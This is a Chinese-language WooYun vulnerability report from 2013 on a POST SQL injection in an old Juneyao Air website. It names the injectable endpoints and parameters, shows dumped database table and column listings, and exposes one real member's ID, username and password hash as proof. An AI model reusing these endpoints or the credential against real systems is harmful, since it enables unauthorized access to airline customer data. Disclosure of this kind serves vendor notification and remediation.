当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-047254

漏洞标题:吉祥航空某站POST注入170万用户口令等敏感信息泄露

相关厂商:www.juneyaoair.com

漏洞作者: 爱上襄阳

提交时间:2013-12-28 17:47

修复时间:2014-02-11 17:48

公开时间:2014-02-11 17:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-28: 细节已通知厂商并且等待厂商处理中
2013-12-31: 厂商已经确认,细节仅向厂商公开
2014-01-10: 细节向核心白帽子及相关领域专家公开
2014-01-20: 细节向普通白帽子公开
2014-01-30: 细节向实习白帽子公开
2014-02-11: 细节向公众公开

简要描述:

吉祥航空某站POST注入170万用户口令信息等敏感信息泄露

详细说明:

吉祥航空老站:http://2012b2c.juneyaoair.com/
但是数据库仍然是老库,注册了一个账号,新站,老站通用。
注入点:
http://2012b2c.juneyaoair.com/crmInterLogin.do loginPwdId=123456&loginNameId=123456 实体loginNameId需过滤
http://2012b2c.juneyaoair.com/resetPwd.do loginType=1&sendType=1&id=88952634
实体id需过滤
跑数据库:

2013-12-28 16-53-04.png


跑当前库的表:
Database: HOFFP
[181 tables]
+--------------------------------+
| AAA |
| TBL_ADDRESS_CITY |
| TBL_AIRLINE |
| TBL_AIRLINE_CODE_SHARE |
| TBL_AIRPORT |
| TBL_BILLING_FILE_INFO |
| TBL_CARD_NUMBER_ASSIGN |
| TBL_CARD_NUMBER_CREATE_HIS |
| TBL_CHARACTER_SPELL_INDEX |
| TBL_CITY |
| TBL_CKI_INFO |
| TBL_CLASS |
| TBL_CLASS_EXCHANGE_RULE |
| TBL_CLASS_MULTIPLIER_RULE |
| TBL_CLASS_TYPE |
| TBL_COLLECT_PNR |
| TBL_COMPANY_ACCOUNT |
| TBL_COMPANY_ACCUMULATE_RULE |
| TBL_COMPANY_EXTRA_ACTIVITY |
| TBL_COMPANY_FLIGHT_ACTIVITY |
| TBL_COMPANY_INFO |
| TBL_COMPANY_MEMBER |
| TBL_COMPANY_MILES_DETAIL |
| TBL_COMPANY_MILES_EXPIRE |
| TBL_COMPANY_MILES_SPEND |
| TBL_COMPANY_PASSWORD_ALTER_HIS |
| TBL_COMPANY_REDEEM_RULE |
| TBL_COMPANY_TYPE |
| TBL_COUNTRY |
| TBL_CUSTOMER_ADDRESS |
| TBL_CUSTOMER_B2C |
| TBL_CUSTOMER_CERTIFICATE |
| TBL_CUSTOMER_CONTACT |
| TBL_CUSTOMER_INFO |
| TBL_CUSTOMER_INFO_TEMP |
| TBL_DATA_EXCHANGE_ERRCODE |
| TBL_DATA_EXCHANGE_HIS |
| TBL_EMAIL_JOB_ACCOUNT |
| TBL_EMAIL_JOB_LIST |
| TBL_ENROLLMENT_SOURCE |
| TBL_EXTRA_MILES_RULE |
| TBL_FLIGHT_ACTIVITY |
| TBL_FLIGHT_BALANCE_ACTIVITY |
| TBL_FLIGHT_CONTROL_RULE |
| TBL_FLIGHT_REDEEM |
| TBL_FLIGHT_REDEEM_DETAIL |
| TBL_FLIGHT_REDEEM_EXPENSE_RULE |
| TBL_FLIGHT_REDEEM_REJECT |
| TBL_FLIGHT_REDEEM_RULE |
| TBL_FLIGHT_REDEEM_TEMP |
| TBL_FLIGHT_REJECT_ACTIVITY |
| TBL_FLIGHT_TEMP_ACTIVITY |
| TBL_FORCE_IMPORT_APPCODE |
| TBL_INFO_CUSTOM_TYPE |
| TBL_INFO_DISTRIBUTE |
| TBL_INITIAL_REDEEM_RULE |
| TBL_INVALID_TICKET_HISTORY |
| TBL_IRREGULAR_REASON |
| TBL_JOB_MESSAGE_CONFIG |
| TBL_JOB_SETTING |
| TBL_KEYCUSTOMER_AGREEMENT |
| TBL_KEYCUSTOMER_AGREEMENT_SUB |
| TBL_KEYCUSTOMER_COUPON_HIS |
| TBL_KEYCUSTOMER_EXPAND_ASSIGN |
| TBL_KEYCUSTOMER_INFO |
| TBL_KEYCUSTOMER_NOTICE |
| TBL_KEYCUSTOMER_REDEEM |
| TBL_KEYCUSTOMER_SETTLEMENT |
| TBL_KEYCUSTOMER_TICKET_HIS |
| TBL_KEYCUSTOMER_VISIT_HIS |
| TBL_KEYCUSTOMER_VISIT_TASK |
| TBL_LOCAL_ACCRUAL_RULE |
| TBL_LOCAL_ASSIGN_GROUP |
| TBL_MEMBER_ACTIVITY_DETAIL |
| TBL_MEMBER_ACTIVITY_SPEND |
| TBL_MEMBER_BENEFIC_CHANGE_HIS |
| TBL_MEMBER_BENEFIC_INFO |
| TBL_MEMBER_BENEFIC_RULE |
| TBL_MEMBER_CARD |
| TBL_MEMBER_CARD_STATUS |
| TBL_MEMBER_CURRENT_ACCOUNT |
| TBL_MEMBER_EXTRA_ACTIVITY |
| TBL_MEMBER_FULFILLMENT_HISTORY |
| TBL_MEMBER_FULFILMENT_FILE_HIS |
| TBL_MEMBER_GROUP_CODE |
| TBL_MEMBER_GROUP_HISTORY |
| TBL_MEMBER_ID_MERGE_HIS |
| TBL_MEMBER_ID_USAGE |
| TBL_MEMBER_INFO |
| TBL_MEMBER_INFO_CHANGE_HISTORY |
| TBL_MEMBER_LEVEL |
| TBL_MEMBER_LEVEL_CHANGE_HIS |
| TBL_MEMBER_LEVEL_UPGRADE_RULE |
| TBL_MEMBER_MILEAGE_ACCOUNT |
| TBL_MEMBER_MILEAGE_ADJUST |
| TBL_MEMBER_MILEAGE_EXPIRE |
| TBL_MEMBER_PASSWORD |
| TBL_MEMBER_PASSWORD_ALTER_HIS |
| TBL_MEMBER_PROMOTION_ACTIVITY |
| TBL_MEMBER_PROMOTION_TRACE |
| TBL_MEMBER_REFULFILLMENT_HIS |
| TBL_MEMBER_RELATION_ASSIGN |
| TBL_MEMBER_SERVICE_RECORD |
| TBL_MEMBER_STATUS |
| TBL_MEMBER_STATUS_CHANGE_HIS |
| TBL_MEMBER_SUPPLIER_INFO |
| TBL_MEMBER_VERIFYCODE |
| TBL_MEMBER_WEB_LOGON_HISTORY |
| TBL_MESSAGE_CONFIG |
| TBL_MILEAGE_PURCHASE |
| TBL_MILEAGE_PURCHASE_REJECT |
| TBL_MILEAGE_PURCHASE_RULE |
| TBL_MILEAGE_PURCHASE_TEMP |
| TBL_MILEAGE_VERIFY |
| TBL_MW_CLIENT_INFO |
| TBL_MW_LOG |
| TBL_NETPAY_ORDER_HISTORY |
| TBL_NETPAY_ORDER_MANUAL_HIS |
| TBL_NOTE |
| TBL_NOTE_TYPE |
| TBL_NOTFLIGHT_REDEEM_RULE |
| TBL_NOT_FLIGHT_ACTIVITY |
| TBL_NOT_FLIGHT_REDEEM |
| TBL_NOT_FLIGHT_REDEEM_REJECT |
| TBL_NOT_FLIGHT_REDEEM_TEMP |
| TBL_PARAMETERS |
| TBL_PARAMETERS_TYPE |
| TBL_PROGRAM_COUNTRY |
| TBL_PROMOTION_CHILD_RULE |
| TBL_PROMOTION_FLIGHT_RULE |
| TBL_PROMOTION_MASTER_RULE |
| TBL_PROMOTION_NOT_FLIGHT_RULE |
| TBL_PROMOTION_VIP_RULE |
| TBL_PROVINCE |
| TBL_PURCHASE_TICKET |
| TBL_QUALIFICATION_REASON |
| TBL_REDEEM_CONTROL_RULE |
| TBL_REDEEM_QUANTITY_RULE |
| TBL_REDEEM_SPECIAL_RULE |
| TBL_ROLES |
| TBL_ROLES_RIGHTS |
| TBL_SALUTATION |
| TBL_SEGMENT_CONTROL_RULE |
| TBL_SEGMENT_MILEAGE |
| TBL_SENDING_SOURCE |
| TBL_SERVICE_CUSTOM_CONFIG |
| TBL_SMS_SEND_HISTORY |
| TBL_SMS_TYPE |
| TBL_SPECIAL_CLASS_RULE |
| TBL_SPECIAL_PROMOTION_RULE |
| TBL_STATEMENT_CONTENT |
| TBL_STATEMENT_DETAIL |
| TBL_STATEMENT_INFO |
| TBL_STATEMENT_SEND_HISTORY |
| TBL_STATIC_MEMBER_GROUP |
| TBL_SUPPLIER |
| TBL_SUPPLIER_ACCRUAL_RULE |
| TBL_SUPPLIER_ASSIGN_GROUP |
| TBL_SUPPLIER_BALANCE |
| TBL_SUPPLIER_BILLINGFILE_HIS |
| TBL_SUPPLIER_CLASS_RULE |
| TBL_SUPPLIER_DATAEXP_SEQNO |
| TBL_SUPPLIER_FLIGHT_ACTIVITY |
| TBL_SUPPLIER_FLIGHT_BALANCE |
| TBL_SUPPLIER_GROUP |
| TBL_SUPPLIER_PRODUCT |
| TBL_SUPPLIER_PRODUCT_TYPE |
| TBL_SUPPLIER_PROTOCOL_CONFIG |
| TBL_SUPPLIER_TEMPLATE_CONFIG |
| TBL_SUPPRETRO_REGISTER |
| TBL_SUPP_MIN_MILES_RULE |
| TBL_SYSTEM_FUNCTION_MANAGER |
| TBL_SYSTEM_LOG |
| TBL_SYSTEM_PARAMETER |
| TBL_UNITED_CARD_COMPANY |
| TBL_USERS |
| TBL_USER_ROLES |
| TBL_VIRTUAL_TICKETNO_RULE |
| TEMP1 |
| TEMP2 |
| UPGRADE_CABIN_INFO |
+--------------------------------+
跑users表,猜测应该是管理表:
Table: TBL_USERS
[10 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| COMMENTS | VARCHAR2 |
| DEPARTMENT_CODE | VARCHAR2 |
| OPERATE_DATE | DATE |
| OPERATE_USER_ID | VARCHAR2 |
| STATUS | VARCHAR2 |
| UPDATE_DATE | DATE |
| UPDATE_USER_ID | VARCHAR2 |
| USER_ID | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_PASSWORD | VARCHAR2 |
+-----------------+----------+
160多个后台用户:

2013-12-28 16-55-21.png


跑member信息:
Database: HOFFP
Table: TBL_MEMBER_PASSWORD
[12 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| B2C_PASSWORD | VARCHAR2 |
| COMMENTS | VARCHAR2 |
| ID | NUMBER |
| MEMBER_ID | VARCHAR2 |
| OPERATE_DATE | DATE |
| OPERATE_USER_ID | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| PSW_STATUS | VARCHAR2 |
| RESET_ANSWER | VARCHAR2 |
| RESET_QUESTION | VARCHAR2 |
| UPDATE_DATE | DATE |
| UPDATE_USER_ID | VARCHAR2 |
+-----------------+----------+
用户登录账号口令信息:

2013-12-28 16-26-41.png


漏洞证明:

登录一个账户试试:
| 1801053115 | zhangting 6456C7FAC445F3C1C3E7F4405159D80
二次解密后,密码为6个1

2013-12-28 17-06-07.png


修复方案:

过滤,修复

版权声明:转载请注明来源 爱上襄阳@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2013-12-31 10:11

厂商回复:

CNVD确认所述情况,已经由CNVD通过公开联系渠道联系网站管理单位以及网站管理员处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-12-28 18:44 | 丹木秋风 ( 路人 | Rank:10 漏洞数:1 | NULL)

    擦,板凳

  2. 2013-12-28 18:48 | 丹木秋风 ( 路人 | Rank:10 漏洞数:1 | NULL)

    @丹木秋风 目测文件被删除了好象来晚了